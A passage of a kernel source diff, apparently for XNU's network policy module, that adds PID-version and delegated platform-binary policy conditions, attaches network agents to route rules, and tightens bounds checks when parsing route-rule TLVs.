+ sizeof(u_int32_t)); // These are for the condition TLVs. The space for "value" is already accounted for above. 
@@ -2838,7 +2849,10 @@ necp_handle_policy_dump_all(user_addr_t out_buffer, size_t out_buffer_length) } } if (condition_mask & NECP_KERNEL_CONDITION_PID) { - cond_buf_cursor = necp_buffer_write_tlv(cond_buf_cursor, NECP_POLICY_CONDITION_PID, sizeof(policy->cond_pid), &policy->cond_pid, + uint8_t pid_buffer[sizeof(policy->cond_pid) + sizeof(policy->cond_pid_version)] = { }; + memcpy(pid_buffer, &policy->cond_pid, sizeof(policy->cond_pid)); + memcpy(pid_buffer + sizeof(policy->cond_pid), &policy->cond_pid_version, sizeof(policy->cond_pid_version)); + cond_buf_cursor = necp_buffer_write_tlv(cond_buf_cursor, NECP_POLICY_CONDITION_PID, sizeof(pid_buffer), &pid_buffer, cond_buf, condition_tlv_length); } if (condition_mask & NECP_KERNEL_CONDITION_UID) { @@ -2919,6 +2933,9 @@ necp_handle_policy_dump_all(user_addr_t out_buffer, size_t out_buffer_length) if (condition_mask & NECP_KERNEL_CONDITION_IS_LOOPBACK) { cond_buf_cursor = necp_buffer_write_tlv(cond_buf_cursor, NECP_POLICY_CONDITION_FLOW_IS_LOOPBACK, 0, "", cond_buf, condition_tlv_length); } + if (condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) { + cond_buf_cursor = necp_buffer_write_tlv(cond_buf_cursor, NECP_POLICY_CONDITION_DELEGATE_IS_PLATFORM_BINARY, 0, "", cond_buf, condition_tlv_length); + } } cursor = necp_buffer_write_tlv(cursor, NECP_TLV_POLICY_CONDITION, cond_buf_cursor - cond_buf, cond_buf, tlv_buffer, total_allocated_bytes); @@ -3239,6 +3256,7 @@ necp_policy_apply(struct necp_session *session, struct necp_session_policy *poli char *cond_custom_entitlement = NULL; char *cond_signing_identifier = NULL; pid_t cond_pid = 0; + int32_t cond_pid_version = 0; uid_t cond_uid = 0; necp_app_id cond_app_id = 0; necp_app_id cond_real_app_id = 0; @@ -3407,6 +3425,9 @@ necp_policy_apply(struct necp_session *session, struct necp_session_policy *poli master_condition_negated_mask |= NECP_KERNEL_CONDITION_PID; } memcpy(&cond_pid, condition_value, sizeof(cond_pid)); + if (condition_length >= (sizeof(pid_t) 
+ sizeof(cond_pid_version))) { + memcpy(&cond_pid_version, (condition_value + sizeof(pid_t)), sizeof(cond_pid_version)); + } socket_only_conditions = TRUE; } break; @@ -3631,6 +3652,14 @@ necp_policy_apply(struct necp_session *session, struct necp_session_policy *poli socket_only_conditions = TRUE; break; } + case NECP_POLICY_CONDITION_DELEGATE_IS_PLATFORM_BINARY: { + master_condition_mask |= NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY; + if (condition_is_negative) { + master_condition_negated_mask |= NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY; + } + socket_only_conditions = TRUE; + break; + } default: { break; } @@ -3817,7 +3846,7 @@ necp_policy_apply(struct necp_session *session, struct necp_session_policy *poli } if (socket_layer_non_id_conditions) { - necp_kernel_policy_id policy_id = necp_kernel_socket_policy_add(policy->order, session->session_order, session->proc_pid, master_condition_mask, master_condition_negated_mask, cond_app_id, cond_real_app_id, cond_custom_entitlement, cond_account_id, cond_domain, cond_pid, cond_uid, cond_bound_interface, cond_traffic_class, cond_protocol, &cond_local_start, &cond_local_end, cond_local_prefix, &cond_remote_start, &cond_remote_end, cond_remote_prefix, &cond_agent_type, &cond_sdk_version, cond_client_flags, cond_signing_identifier, cond_packet_filter_tags, ultimate_result, ultimate_result_parameter); + necp_kernel_policy_id policy_id = necp_kernel_socket_policy_add(policy->order, session->session_order, session->proc_pid, master_condition_mask, master_condition_negated_mask, cond_app_id, cond_real_app_id, cond_custom_entitlement, cond_account_id, cond_domain, cond_pid, cond_pid_version, cond_uid, cond_bound_interface, cond_traffic_class, cond_protocol, &cond_local_start, &cond_local_end, cond_local_prefix, &cond_remote_start, &cond_remote_end, cond_remote_prefix, &cond_agent_type, &cond_sdk_version, cond_client_flags, cond_signing_identifier, cond_packet_filter_tags, ultimate_result, 
ultimate_result_parameter); if (policy_id == 0) { NECPLOG0(LOG_DEBUG, "Error applying socket kernel policy"); @@ -3986,10 +4015,10 @@ necp_kernel_policy_get_new_id(bool socket_level) return newid; } -#define NECP_KERNEL_VALID_SOCKET_CONDITIONS (NECP_KERNEL_CONDITION_APP_ID | NECP_KERNEL_CONDITION_REAL_APP_ID | NECP_KERNEL_CONDITION_DOMAIN | NECP_KERNEL_CONDITION_ACCOUNT_ID | NECP_KERNEL_CONDITION_PID | NECP_KERNEL_CONDITION_UID | NECP_KERNEL_CONDITION_ALL_INTERFACES | NECP_KERNEL_CONDITION_BOUND_INTERFACE | NECP_KERNEL_CONDITION_TRAFFIC_CLASS | NECP_KERNEL_CONDITION_PROTOCOL | NECP_KERNEL_CONDITION_LOCAL_START | NECP_KERNEL_CONDITION_LOCAL_END | NECP_KERNEL_CONDITION_LOCAL_PREFIX | NECP_KERNEL_CONDITION_REMOTE_START | NECP_KERNEL_CONDITION_REMOTE_END | NECP_KERNEL_CONDITION_REMOTE_PREFIX | NECP_KERNEL_CONDITION_ENTITLEMENT | NECP_KERNEL_CONDITION_CUSTOM_ENTITLEMENT | NECP_KERNEL_CONDITION_AGENT_TYPE | NECP_KERNEL_CONDITION_HAS_CLIENT | NECP_KERNEL_CONDITION_LOCAL_NETWORKS | NECP_KERNEL_CONDITION_CLIENT_FLAGS | NECP_KERNEL_CONDITION_LOCAL_EMPTY | NECP_KERNEL_CONDITION_REMOTE_EMPTY | NECP_KERNEL_CONDITION_PLATFORM_BINARY | NECP_KERNEL_CONDITION_SDK_VERSION | NECP_KERNEL_CONDITION_SIGNING_IDENTIFIER | NECP_KERNEL_CONDITION_PACKET_FILTER_TAGS | NECP_KERNEL_CONDITION_IS_LOOPBACK) +#define NECP_KERNEL_VALID_SOCKET_CONDITIONS (NECP_KERNEL_CONDITION_APP_ID | NECP_KERNEL_CONDITION_REAL_APP_ID | NECP_KERNEL_CONDITION_DOMAIN | NECP_KERNEL_CONDITION_ACCOUNT_ID | NECP_KERNEL_CONDITION_PID | NECP_KERNEL_CONDITION_UID | NECP_KERNEL_CONDITION_ALL_INTERFACES | NECP_KERNEL_CONDITION_BOUND_INTERFACE | NECP_KERNEL_CONDITION_TRAFFIC_CLASS | NECP_KERNEL_CONDITION_PROTOCOL | NECP_KERNEL_CONDITION_LOCAL_START | NECP_KERNEL_CONDITION_LOCAL_END | NECP_KERNEL_CONDITION_LOCAL_PREFIX | NECP_KERNEL_CONDITION_REMOTE_START | NECP_KERNEL_CONDITION_REMOTE_END | NECP_KERNEL_CONDITION_REMOTE_PREFIX | NECP_KERNEL_CONDITION_ENTITLEMENT | NECP_KERNEL_CONDITION_CUSTOM_ENTITLEMENT | 
NECP_KERNEL_CONDITION_AGENT_TYPE | NECP_KERNEL_CONDITION_HAS_CLIENT | NECP_KERNEL_CONDITION_LOCAL_NETWORKS | NECP_KERNEL_CONDITION_CLIENT_FLAGS | NECP_KERNEL_CONDITION_LOCAL_EMPTY | NECP_KERNEL_CONDITION_REMOTE_EMPTY | NECP_KERNEL_CONDITION_PLATFORM_BINARY | NECP_KERNEL_CONDITION_SDK_VERSION | NECP_KERNEL_CONDITION_SIGNING_IDENTIFIER | NECP_KERNEL_CONDITION_PACKET_FILTER_TAGS | NECP_KERNEL_CONDITION_IS_LOOPBACK | NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) static necp_kernel_policy_id -necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, int session_pid, u_int32_t condition_mask, u_int32_t condition_negated_mask, necp_app_id cond_app_id, necp_app_id cond_real_app_id, char *cond_custom_entitlement, u_int32_t cond_account_id, char *cond_domain, pid_t cond_pid, uid_t cond_uid, ifnet_t cond_bound_interface, struct necp_policy_condition_tc_range cond_traffic_class, u_int16_t cond_protocol, union necp_sockaddr_union *cond_local_start, union necp_sockaddr_union *cond_local_end, u_int8_t cond_local_prefix, union necp_sockaddr_union *cond_remote_start, union necp_sockaddr_union *cond_remote_end, u_int8_t cond_remote_prefix, struct necp_policy_condition_agent_type *cond_agent_type, struct necp_policy_condition_sdk_version *cond_sdk_version, u_int32_t cond_client_flags, char *cond_signing_identifier, u_int16_t cond_packet_filter_tags, necp_kernel_policy_result result, necp_kernel_policy_result_parameter result_parameter) +necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, int session_pid, u_int32_t condition_mask, u_int32_t condition_negated_mask, necp_app_id cond_app_id, necp_app_id cond_real_app_id, char *cond_custom_entitlement, u_int32_t cond_account_id, char *cond_domain, pid_t cond_pid, int32_t cond_pid_version, uid_t cond_uid, ifnet_t cond_bound_interface, struct necp_policy_condition_tc_range cond_traffic_class, u_int16_t cond_protocol, union necp_sockaddr_union *cond_local_start, union necp_sockaddr_union 
*cond_local_end, u_int8_t cond_local_prefix, union necp_sockaddr_union *cond_remote_start, union necp_sockaddr_union *cond_remote_end, u_int8_t cond_remote_prefix, struct necp_policy_condition_agent_type *cond_agent_type, struct necp_policy_condition_sdk_version *cond_sdk_version, u_int32_t cond_client_flags, char *cond_signing_identifier, u_int16_t cond_packet_filter_tags, necp_kernel_policy_result result, necp_kernel_policy_result_parameter result_parameter) { struct necp_kernel_socket_policy *new_kernel_policy = NULL; struct necp_kernel_socket_policy *tmp_kernel_policy = NULL; @@ -4046,6 +4075,7 @@ necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, } if (new_kernel_policy->condition_mask & NECP_KERNEL_CONDITION_PID) { new_kernel_policy->cond_pid = cond_pid; + new_kernel_policy->cond_pid_version = cond_pid_version; } if (new_kernel_policy->condition_mask & NECP_KERNEL_CONDITION_UID) { new_kernel_policy->cond_uid = cond_uid; @@ -4562,7 +4592,7 @@ necp_kernel_socket_policy_is_unnecessary(struct necp_kernel_socket_policy *polic } if (compared_policy->condition_mask & NECP_KERNEL_CONDITION_PID && - compared_policy->cond_pid != policy->cond_pid) { + (compared_policy->cond_pid != policy->cond_pid || compared_policy->cond_pid_version != policy->cond_pid_version)) { continue; } @@ -4970,7 +5000,7 @@ necp_lookup_route_rule_locked(struct necp_route_rule_list *list, u_int32_t route } static struct necp_route_rule * -necp_lookup_route_rule_by_contents_locked(struct necp_route_rule_list *list, u_int32_t default_action, u_int8_t cellular_action, u_int8_t wifi_action, u_int8_t wired_action, u_int8_t expensive_action, u_int8_t constrained_action, u_int32_t *if_indices, u_int8_t *if_actions) +necp_lookup_route_rule_by_contents_locked(struct necp_route_rule_list *list, u_int8_t default_action, u_int8_t cellular_action, u_int8_t wifi_action, u_int8_t wired_action, u_int8_t expensive_action, u_int8_t constrained_action, u_int32_t *if_indices, u_int8_t 
*if_actions, uuid_t netagent_uuid) { struct necp_route_rule *searchentry = NULL; struct necp_route_rule *foundentry = NULL; @@ -5011,10 +5041,32 @@ necp_lookup_route_rule_by_contents_locked(struct necp_route_rule_list *list, u_i break; } } - if (!match_failed && count_a == count_b) { - foundentry = searchentry; - break; + + if (match_failed || count_a != count_b) { + continue; + } + + bool has_agent_a = !uuid_is_null(netagent_uuid); /* true iff the caller supplied a non-null agent UUID */ + bool has_agent_b = (searchentry->netagent_id != 0); + if (has_agent_a != has_agent_b) { + continue; } + + if (has_agent_a) { + struct necp_uuid_id_mapping *mapping = necp_uuid_lookup_uuid_with_service_id_locked(searchentry->netagent_id); + if (mapping == NULL) { + // Bad mapping, doesn't match + continue; + } + if (uuid_compare(mapping->uuid, netagent_uuid) != 0) { + // UUIDs don't match + continue; + } + } + + // Rules match! + foundentry = searchentry; + break; } } @@ -5027,7 +5079,7 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_ size_t offset = 0; u_int32_t route_rule_id = 0; struct necp_route_rule *existing_rule = NULL; - u_int32_t default_action = NECP_ROUTE_RULE_ALLOW_INTERFACE; + u_int8_t default_action = NECP_ROUTE_RULE_ALLOW_INTERFACE; u_int8_t cellular_action = NECP_ROUTE_RULE_NONE; u_int8_t wifi_action = NECP_ROUTE_RULE_NONE; u_int8_t wired_action = NECP_ROUTE_RULE_NONE; @@ -5039,6 +5091,8 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_ u_int8_t if_actions[MAX_ROUTE_RULE_INTERFACES]; memset(&if_actions, 0, sizeof(if_actions)); + uuid_t netagent_uuid = {}; + LCK_RW_ASSERT(&necp_kernel_policy_lock, LCK_RW_ASSERT_EXCLUSIVE); if (route_rules_array == NULL || route_rules_array_size == 0) { @@ -5046,12 +5100,20 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_ } // Process rules - while (offset < route_rules_array_size) { + while ((offset + sizeof(u_int8_t) + sizeof(u_int32_t)) < route_rules_array_size) { ifnet_t
rule_interface = NULL; char interface_name[IFXNAMSIZ]; u_int32_t length = 0; u_int8_t *value = necp_buffer_get_tlv_value(route_rules_array, offset, &length); + if (offset + sizeof(u_int8_t) + sizeof(u_int32_t) + length > route_rules_array_size) { + // Invalid TLV goes beyond end of the rules array + break; + } + + // Increment offset for the next time through the loop + offset += sizeof(u_int8_t) + sizeof(u_int32_t) + length; + u_int8_t rule_type = necp_policy_condition_get_type_from_buffer(value, length); u_int8_t rule_flags = necp_policy_condition_get_flags_from_buffer(value, length); u_int32_t rule_length = necp_policy_condition_get_value_length_from_buffer(value, length); @@ -5062,6 +5124,27 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_ continue; } + if (rule_type == NECP_ROUTE_RULE_USE_NETAGENT) { + if (rule_length < sizeof(uuid_t)) { + // Too short, skip + continue; + } + + if (!uuid_is_null(netagent_uuid)) { + if (uuid_compare(netagent_uuid, rule_value) != 0) { + // UUIDs don't match, skip + continue; + } + } else { + // Copy out agent UUID + memcpy(netagent_uuid, rule_value, sizeof(netagent_uuid)); + } + + // Adjust remaining length + rule_value += sizeof(netagent_uuid); + rule_length -= sizeof(netagent_uuid); + } + if (rule_length == 0) { if (rule_flags & NECP_ROUTE_RULE_FLAG_CELLULAR) { cellular_action = rule_type; @@ -5081,12 +5164,10 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_ if (rule_flags == 0) { default_action = rule_type; } - offset += sizeof(u_int8_t) + sizeof(u_int32_t) + length; continue; } if (num_valid_indices >= MAX_ROUTE_RULE_INTERFACES) { - offset += sizeof(u_int8_t) + sizeof(u_int32_t) + length; continue; } @@ -5099,10 +5180,9 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_ ifnet_release(rule_interface); } } - offset += sizeof(u_int8_t) + sizeof(u_int32_t) + length; } - existing_rule = 
necp_lookup_route_rule_by_contents_locked(list, default_action, cellular_action, wifi_action, wired_action, expensive_action, constrained_action, if_indices, if_actions); + existing_rule = necp_lookup_route_rule_by_contents_locked(list, default_action, cellular_action, wifi_action, wired_action, expensive_action, constrained_action, if_indices, if_actions, netagent_uuid); if (existing_rule != NULL) { route_rule_id = existing_rule->id; os_ref_retain_locked(&existing_rule->refcount); @@ -5112,6 +5192,9 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_ if (new_rule != NULL) { memset(new_rule, 0, sizeof(struct necp_route_rule)); route_rule_id = new_rule->id = necp_get_new_route_rule_id(false); + if (!uuid_is_null(netagent_uuid)) { + new_rule->netagent_id = necp_create_uuid_service_id_mapping(netagent_uuid); + } new_rule->default_action = default_action; new_rule->cellular_action = cellular_action; new_rule->wifi_action = wifi_action; @@ -5163,6 +5246,7 @@ necp_remove_route_rule(struct necp_route_rule_list *list, u_int32_t route_rule_i if (existing_rule != NULL) { if (os_ref_release_locked(&existing_rule->refcount) == 0) { necp_remove_aggregate_route_rule_for_id(existing_rule->id); + necp_remove_uuid_service_id_mapping_with_service_id(existing_rule->netagent_id); LIST_REMOVE(existing_rule, chain); FREE(existing_rule, M_NECP); } @@ -5491,6 +5575,28 @@ necp_remove_uuid_service_id_mapping(uuid_t uuid) return FALSE; } +static bool +necp_remove_uuid_service_id_mapping_with_service_id(u_int32_t service_id) +{ + struct necp_uuid_id_mapping *existing_mapping = NULL; + + if (service_id == 0) { + return TRUE; + } + + LCK_RW_ASSERT(&necp_kernel_policy_lock, LCK_RW_ASSERT_EXCLUSIVE); + + existing_mapping = necp_uuid_lookup_uuid_with_service_id_locked(service_id); + if (existing_mapping != NULL) { + if (os_ref_release_locked(&existing_mapping->refcount) == 0) { + LIST_REMOVE(existing_mapping, chain); + FREE(existing_mapping, M_NECP); + } + return 
TRUE; + } + + return FALSE; +} static bool necp_kernel_socket_policies_update_uuid_table(void) @@ -6142,15 +6248,11 @@ necp_check_restricted_multicast_drop(proc_t proc, struct necp_socket_info *info, const uint32_t sdk = proc_sdk(proc); // Enforce for iOS, linked on or after version 14 - // If the caller set `check_minor_version`, only enforce starting at 14.TBD + // If the caller set `check_minor_version`, only enforce starting at 14.5 if (platform != PLATFORM_IOS || sdk == 0 || (sdk >> 16) < 14 || -#if 0 - (check_minor_version && (sdk >> 16) == 14 && ((sdk >> 8) & 0xff) < TBD)) { -#else - (check_minor_version)) { -#endif + (check_minor_version && (sdk >> 16) == 14 && ((sdk >> 8) & 0xff) < 5)) { return false; } @@ -6169,11 +6271,12 @@ necp_check_restricted_multicast_drop(proc_t proc, struct necp_socket_info *info, #define NECP_KERNEL_ADDRESS_TYPE_CONDITIONS (NECP_KERNEL_CONDITION_LOCAL_START | NECP_KERNEL_CONDITION_LOCAL_END | NECP_KERNEL_CONDITION_LOCAL_PREFIX | NECP_KERNEL_CONDITION_REMOTE_START | NECP_KERNEL_CONDITION_REMOTE_END | NECP_KERNEL_CONDITION_REMOTE_PREFIX | NECP_KERNEL_CONDITION_LOCAL_EMPTY | NECP_KERNEL_CONDITION_REMOTE_EMPTY | NECP_KERNEL_CONDITION_LOCAL_NETWORKS) static void -necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_application_uuid, uuid_t responsible_application_uuid, char *account, char *domain, pid_t pid, uid_t uid, u_int16_t protocol, u_int32_t bound_interface_index, u_int32_t traffic_class, union necp_sockaddr_union *local_addr, union necp_sockaddr_union *remote_addr, u_int16_t local_port, u_int16_t remote_port, bool has_client, proc_t proc, proc_t responsible_proc, u_int32_t drop_order, u_int32_t client_flags, struct necp_socket_info *info, bool is_loopback) +necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_application_uuid, uuid_t responsible_application_uuid, char *account, char *domain, pid_t pid, int32_t pid_version, uid_t uid, u_int16_t protocol, u_int32_t bound_interface_index, 
u_int32_t traffic_class, union necp_sockaddr_union *local_addr, union necp_sockaddr_union *remote_addr, u_int16_t local_port, u_int16_t remote_port, bool has_client, proc_t real_proc, proc_t proc, proc_t responsible_proc, u_int32_t drop_order, u_int32_t client_flags, struct necp_socket_info *info, bool is_loopback, bool is_delegated) { memset(info, 0, sizeof(struct necp_socket_info)); info->pid = pid; + info->pid_version = pid_version; info->uid = uid; info->protocol = protocol; info->bound_interface_index = bound_interface_index; @@ -6182,6 +6285,7 @@ necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_applic info->drop_order = drop_order; info->client_flags = client_flags; info->is_loopback = is_loopback; + info->is_delegated = is_delegated; if (necp_kernel_application_policies_condition_mask & NECP_KERNEL_CONDITION_APP_ID && !uuid_is_null(application_uuid)) { struct necp_uuid_id_mapping *existing_mapping = necp_uuid_lookup_app_id_locked(application_uuid); @@ -6226,6 +6330,10 @@ necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_applic info->is_platform_binary = necp_is_platform_binary(proc) ? true : false; } + if (necp_kernel_application_policies_condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY && real_proc != NULL) { + info->real_is_platform_binary = (necp_is_platform_binary(real_proc) ? 
true : false); + } + if (necp_kernel_application_policies_condition_mask & NECP_KERNEL_CONDITION_ACCOUNT_ID && account != NULL) { struct necp_string_id_mapping *existing_mapping = necp_lookup_string_to_id_locked(&necp_account_id_list, account); if (existing_mapping) { @@ -6244,10 +6352,17 @@ necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_applic if (local_port != 0) { info->local_addr.sin6.sin6_port = local_port; } - } else if (local_port != 0) { - info->local_addr.sin6.sin6_len = sizeof(struct sockaddr_in6); - info->local_addr.sin6.sin6_family = AF_INET6; - info->local_addr.sin6.sin6_port = local_port; + } else { + if (remote_addr && remote_addr->sa.sa_len > 0) { + info->local_addr.sa.sa_family = remote_addr->sa.sa_family; + info->local_addr.sa.sa_len = remote_addr->sa.sa_len; + } else { + info->local_addr.sin6.sin6_family = AF_INET6; + info->local_addr.sin6.sin6_len = sizeof(struct sockaddr_in6); + } + if (local_port != 0) { + info->local_addr.sin6.sin6_port = local_port; + } } if (remote_addr && remote_addr->sa.sa_len > 0) { memcpy(&info->remote_addr, remote_addr, remote_addr->sa.sa_len); @@ -6340,6 +6455,7 @@ necp_application_find_policy_match_internal(proc_t proc, u_int16_t local_port = 0; u_int16_t remote_port = 0; necp_drop_all_bypass_check_result_t drop_all_bypass = NECP_DROP_ALL_BYPASS_CHECK_RESULT_NONE; + bool is_delegated = false; if (override_local_addr) { memcpy(&local_addr, override_local_addr, sizeof(local_addr)); @@ -6355,6 +6471,7 @@ necp_application_find_policy_match_internal(proc_t proc, // Initialize UID, PID, and UUIDs to the current process uid_t uid = kauth_cred_getuid(proc_ucred(proc)); pid_t pid = proc_pid(proc); + int32_t pid_version = proc_pidversion(proc); uuid_t application_uuid; uuid_clear(application_uuid); uuid_t real_application_uuid; @@ -6443,6 +6560,7 @@ necp_application_find_policy_match_internal(proc_t proc, NECP_VERIFY_DELEGATION_ENTITLEMENT(proc, "euuid"); + is_delegated = true; 
uuid_copy(application_uuid, value); } break; @@ -6456,6 +6574,7 @@ necp_application_find_policy_match_internal(proc_t proc, NECP_VERIFY_DELEGATION_ENTITLEMENT(proc, "uuid"); + is_delegated = true; uuid_copy(real_application_uuid, value); } break; @@ -6469,6 +6588,7 @@ necp_application_find_policy_match_internal(proc_t proc, NECP_VERIFY_DELEGATION_ENTITLEMENT(proc, "pid"); + is_delegated = true; memcpy(&pid, value, sizeof(pid_t)); } break; @@ -6482,6 +6602,7 @@ necp_application_find_policy_match_internal(proc_t proc, NECP_VERIFY_DELEGATION_ENTITLEMENT(proc, "uid"); + is_delegated = true; memcpy(&uid, value, sizeof(uid_t)); } break; @@ -6623,6 +6744,7 @@ necp_application_find_policy_match_internal(proc_t proc, proc_t found_proc = proc_find(pid); if (found_proc != PROC_NULL) { effective_proc = found_proc; + pid_version = proc_pidversion(effective_proc); release_eproc = true; } } @@ -6640,7 +6762,7 @@ necp_application_find_policy_match_internal(proc_t proc, u_int32_t route_rule_id_array[MAX_AGGREGATE_ROUTE_RULES]; size_t route_rule_id_array_count = 0; - necp_application_fillout_info_locked(application_uuid, real_application_uuid, responsible_application_uuid, account, domain, pid, uid, protocol, bound_interface_index, traffic_class, &local_addr, &remote_addr, local_port, remote_port, has_client, effective_proc, responsible_proc, drop_order, client_flags, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK)); + necp_application_fillout_info_locked(application_uuid, real_application_uuid, responsible_application_uuid, account, domain, pid, pid_version, uid, protocol, bound_interface_index, traffic_class, &local_addr, &remote_addr, local_port, remote_port, has_client, proc, effective_proc, responsible_proc, drop_order, client_flags, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK), is_delegated); matched_policy = necp_socket_find_policy_match_with_info_locked(necp_kernel_socket_policies_app_layer_map, &info, &filter_control_unit, route_rule_id_array, 
&route_rule_id_array_count, MAX_AGGREGATE_ROUTE_RULES, &service_action, &service, netagent_ids, netagent_use_flags, NECP_MAX_NETAGENTS, required_agent_types, num_required_agent_types, info.used_responsible_pid ? responsible_proc : effective_proc, 0, NULL, NULL, &drop_dest_policy_result, &drop_all_bypass, &flow_divert_aggregate_unit); // Check for loopback exception again after the policy match @@ -7035,7 +7157,7 @@ necp_application_find_policy_match_internal(proc_t proc, if (v6Route->rt_ifp != NULL) { *flags |= NECP_CLIENT_RESULT_FLAG_HAS_IPV6; - if (ifnet_get_nat64prefix(v6Route->rt_ifp, NULL) == 0) { + if (ifnet_get_nat64prefix(v6Route->rt_ifp, returned_result->nat64_prefixes) == 0) { *flags |= NECP_CLIENT_RESULT_FLAG_HAS_NAT64; } } @@ -7071,6 +7193,22 @@ necp_application_find_policy_match_internal(proc_t proc, // If the route gets denied, stop matching rules break; } + + // Check if there is a route rule that adds an agent + u_int32_t netagent_id = necp_route_get_netagent(rt, route_rule_id_array[route_rule_index]); + if (netagent_id != 0) { + struct necp_uuid_id_mapping *mapping = necp_uuid_lookup_uuid_with_service_id_locked(netagent_id); + if (mapping != NULL) { + for (netagent_cursor = 0; netagent_cursor < NECP_MAX_NETAGENTS; netagent_cursor++) { + if (uuid_is_null(returned_result->netagents[netagent_cursor])) { + // Found open slot + uuid_copy(returned_result->netagents[netagent_cursor], mapping->uuid); + returned_result->netagent_use_flags[netagent_cursor] = 0; + break; + } + } + } + } } if (rt != NULL && rt->rt_ifp != NULL) { @@ -7169,7 +7307,7 @@ done: } static bool -necp_socket_check_policy(struct necp_kernel_socket_policy *kernel_policy, necp_app_id app_id, necp_app_id real_app_id, errno_t cred_result, u_int32_t account_id, struct substring domain, u_int8_t domain_dot_count, pid_t pid, uid_t uid, u_int32_t bound_interface_index, u_int32_t traffic_class, u_int16_t protocol, union necp_sockaddr_union *local, union necp_sockaddr_union *remote, struct 
necp_client_parameter_netagent_type *required_agent_types, u_int32_t num_required_agent_types, bool has_client, uint32_t client_flags, int is_platform_binary, proc_t proc, u_int16_t pf_tag, struct rtentry *rt, bool is_loopback) +necp_socket_check_policy(struct necp_kernel_socket_policy *kernel_policy, necp_app_id app_id, necp_app_id real_app_id, errno_t cred_result, u_int32_t account_id, struct substring domain, u_int8_t domain_dot_count, pid_t pid, int32_t pid_version, uid_t uid, u_int32_t bound_interface_index, u_int32_t traffic_class, u_int16_t protocol, union necp_sockaddr_union *local, union necp_sockaddr_union *remote, struct necp_client_parameter_netagent_type *required_agent_types, u_int32_t num_required_agent_types, bool has_client, uint32_t client_flags, int is_platform_binary, proc_t proc, u_int16_t pf_tag, struct rtentry *rt, bool is_loopback, bool real_is_platform_binary, bool is_delegated) { if (!(kernel_policy->condition_mask & NECP_KERNEL_CONDITION_ALL_INTERFACES)) { if (kernel_policy->condition_mask & NECP_KERNEL_CONDITION_BOUND_INTERFACE) { @@ -7352,11 +7490,17 @@ necp_socket_check_policy(struct necp_kernel_socket_policy *kernel_policy, necp_a // No match, matches forbidden pid return FALSE; } + if (kernel_policy->cond_pid_version != 0 && pid_version == kernel_policy->cond_pid_version) { + return FALSE; + } } else { if (pid != kernel_policy->cond_pid) { // No match, does not match required pid return FALSE; } + if (kernel_policy->cond_pid_version != 0 && pid_version != kernel_policy->cond_pid_version) { + return FALSE; + } } } @@ -7560,6 +7704,18 @@ necp_socket_check_policy(struct necp_kernel_socket_policy *kernel_policy, necp_a } } + if (is_delegated && (kernel_policy->condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY)) { + if (kernel_policy->condition_negated_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) { + if (real_is_platform_binary) { + return FALSE; + } + } else { + if (!real_is_platform_binary) { + return 
FALSE; + } + } + } + return TRUE; } @@ -7570,7 +7726,7 @@ necp_socket_calc_flowhash_locked(struct necp_socket_info *info) } static void -necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_local_addr, struct sockaddr *override_remote_addr, u_int32_t override_bound_interface, u_int32_t drop_order, proc_t *socket_proc, struct necp_socket_info *info, bool is_loopback) +necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_local_addr, struct sockaddr *override_remote_addr, u_int32_t override_bound_interface, bool override_is_inbound, u_int32_t drop_order, proc_t *socket_proc, struct necp_socket_info *info, bool is_loopback) { struct socket *so = NULL; proc_t sock_proc = NULL; @@ -7582,10 +7738,7 @@ necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_loc info->drop_order = drop_order; info->is_loopback = is_loopback; - - if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_PID) { - info->pid = ((so->so_flags & SOF_DELEGATED) ? so->e_pid : so->last_pid); - } + info->is_delegated = ((so->so_flags & SOF_DELEGATED) ? true : false); if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_UID) { info->uid = kauth_cred_getuid(so->so_cred); @@ -7610,7 +7763,7 @@ necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_loc if (inp->inp_socket->so_flags1 & SOF1_CELLFALLBACK) { info->client_flags |= NECP_CLIENT_PARAMETER_FLAG_FALLBACK_TRAFFIC; } - if (inp->inp_socket->so_flags1 & SOF1_INBOUND) { + if (inp->inp_socket->so_flags1 & SOF1_INBOUND || override_is_inbound) { info->client_flags |= NECP_CLIENT_PARAMETER_FLAG_INBOUND; } if (inp->inp_socket->so_options & SO_ACCEPTCONN || @@ -7678,10 +7831,37 @@ necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_loc } } + if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_PID) { + info->pid = socket_pid; + info->pid_version = proc_pidversion(sock_proc != NULL ? 
